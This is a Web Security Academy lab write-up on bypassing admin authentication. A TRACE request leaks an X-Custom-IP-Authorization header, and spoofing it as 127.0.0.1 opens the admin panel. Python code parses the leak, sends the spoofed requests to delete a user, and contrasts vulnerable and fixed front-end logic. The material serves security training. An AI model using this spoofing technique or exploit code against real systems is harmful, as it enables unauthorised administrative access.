4.11. Web auth bypass via info disclosure (Web Security Academy)
Web Security Academy >> Information disclosure >> Exploiting >> Lab
Log in with the username and password wiener:peter.
Browse to GET /admin. The admin interface is not reachable this way.
In Burp, send the GET /admin request to Repeater and change the method from GET to TRACE.
The TRACE response echoes the request as the back-end received it, and that echo contains a header the browser never sent:
X-Custom-IP-Authorization: 156.174.229.54
The value is our own public IP address. IP addresses are commonly used to identify the source of a connection, so this header is most likely added by the front-end and consulted by the back-end as part of a custom IP-based authorization scheme: requests that appear to come from the server itself are allowed into the admin interface.
The address 127.0.0.1 is localhost, i.e. the machine itself. If the back-end trusts the header blindly, and the front-end does not overwrite a value the client supplies, then sending the request with the header set to 127.0.0.1 should make the back-end treat it as a local request:
X-Custom-IP-Authorization: 127.0.0.1
Turn on intercept in Proxy and add "X-Custom-IP-Authorization: 127.0.0.1" to each intercepted request before forwarding it.
With the header in place, GET /admin now loads the admin panel, and from there we delete the user carlos.
Don't forget to add "X-Custom-IP-Authorization: 127.0.0.1" to every request, including the delete request itself; without it the back-end falls back to the real IP and denies access.
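The whole chain, as an added example that is not part of the original write-up: parse the request echoed by TRACE to discover the header, build the spoofed admin request, and, on the server side, the front-end pattern that makes this work next to the fix. LAB_HOST, the session cookie and the delete path are assumed placeholders taken from the lab's admin panel link, and the TRACE echo below is constructed to match what the write-up describes.

```python
"""Added example (not the write-up's or PortSwigger's code).

Assumptions: LAB_HOST is a placeholder for the lab hostname, and the delete
endpoint /admin/delete?username=carlos is the one linked from the admin panel.
SAMPLE_TRACE_ECHO is a constructed TRACE response body, not a captured one.
"""
import http.client
from typing import Dict, Optional

LAB_HOST = "YOUR-LAB-ID.web-security-academy.net"  # assumed placeholder
HEADER = "X-Custom-IP-Authorization"

# Constructed sample of a TRACE response body: the front-end echoes the
# request it forwarded, including the header it added itself, which is
# how the header name and its meaning leak to the client.
SAMPLE_TRACE_ECHO = (
    "TRACE /admin HTTP/1.1\r\n"
    "Host: YOUR-LAB-ID.web-security-academy.net\r\n"
    "Cookie: session=abc123\r\n"
    "X-Custom-IP-Authorization: 156.174.229.54\r\n"
    "\r\n"
)


def parse_echoed_headers(trace_body: str) -> Dict[str, str]:
    """Turn the echoed request in a TRACE response body into a header dict.
    HTTP header names are case-insensitive, so keys are lower-cased."""
    headers: Dict[str, str] = {}
    for line in trace_body.split("\r\n")[1:]:   # skip the request line
        if not line:                             # blank line ends the headers
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def find_ip_auth_header(trace_body: str) -> Optional[str]:
    """Value the front-end placed in X-Custom-IP-Authorization, or None."""
    return parse_echoed_headers(trace_body).get(HEADER.lower())


def spoofed_headers(session_cookie: str, ip: str = "127.0.0.1") -> Dict[str, str]:
    """Headers for a request that claims to originate from localhost."""
    return {"Cookie": f"session={session_cookie}", HEADER: ip}


# --- Server-side view: why the bypass works and what the fix looks like ---

def frontend_forward_vulnerable(client_headers: Dict[str, str], client_ip: str) -> Dict[str, str]:
    """Vulnerable front-end: sets the header only if the client did not send
    one, so a client-supplied value reaches the back-end untouched."""
    fwd = dict(client_headers)
    if not any(k.lower() == HEADER.lower() for k in fwd):
        fwd[HEADER] = client_ip
    return fwd


def frontend_forward_fixed(client_headers: Dict[str, str], client_ip: str) -> Dict[str, str]:
    """Fixed front-end: drops any client copy of the header and always sets
    it from the real peer address, so the client cannot influence it."""
    fwd = {k: v for k, v in client_headers.items() if k.lower() != HEADER.lower()}
    fwd[HEADER] = client_ip
    return fwd


def backend_is_admin(headers: Dict[str, str]) -> bool:
    """Back-end authorization as the lab behaves: trusts the header blindly."""
    return headers.get(HEADER) == "127.0.0.1"


def exploit(session_cookie: str) -> int:
    """Run the chain against the live lab; returns the delete's status code."""
    conn = http.client.HTTPSConnection(LAB_HOST)
    conn.request("TRACE", "/admin", headers={"Cookie": f"session={session_cookie}"})
    echo = conn.getresponse().read().decode(errors="replace")
    if find_ip_auth_header(echo) is None:
        raise SystemExit("front-end did not echo X-Custom-IP-Authorization")
    conn.request("GET", "/admin/delete?username=carlos",   # assumed path
                 headers=spoofed_headers(session_cookie))
    return conn.getresponse().status


if __name__ == "__main__":
    # Offline demonstration of the trust mistake and its fix.
    leaked = find_ip_auth_header(SAMPLE_TRACE_ECHO)
    client = spoofed_headers("abc123")
    print("leaked header value:", leaked)
    print("vulnerable front-end grants admin:",
          backend_is_admin(frontend_forward_vulnerable(client, "156.174.229.54")))
    print("fixed front-end grants admin:",
          backend_is_admin(frontend_forward_fixed(client, "156.174.229.54")))
```

The fix lives in the front-end, not the back-end: a header that encodes the caller's network position is only meaningful if the component that sets it is the only one that can set it, so it must overwrite whatever the client sent rather than fill it in when absent. Disabling TRACE removes the information leak but leaves the bypass in place.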
Congratulations, you solved the lab!
See you soon in other reports!
Abdelwahab_Shandy
AS_Cyber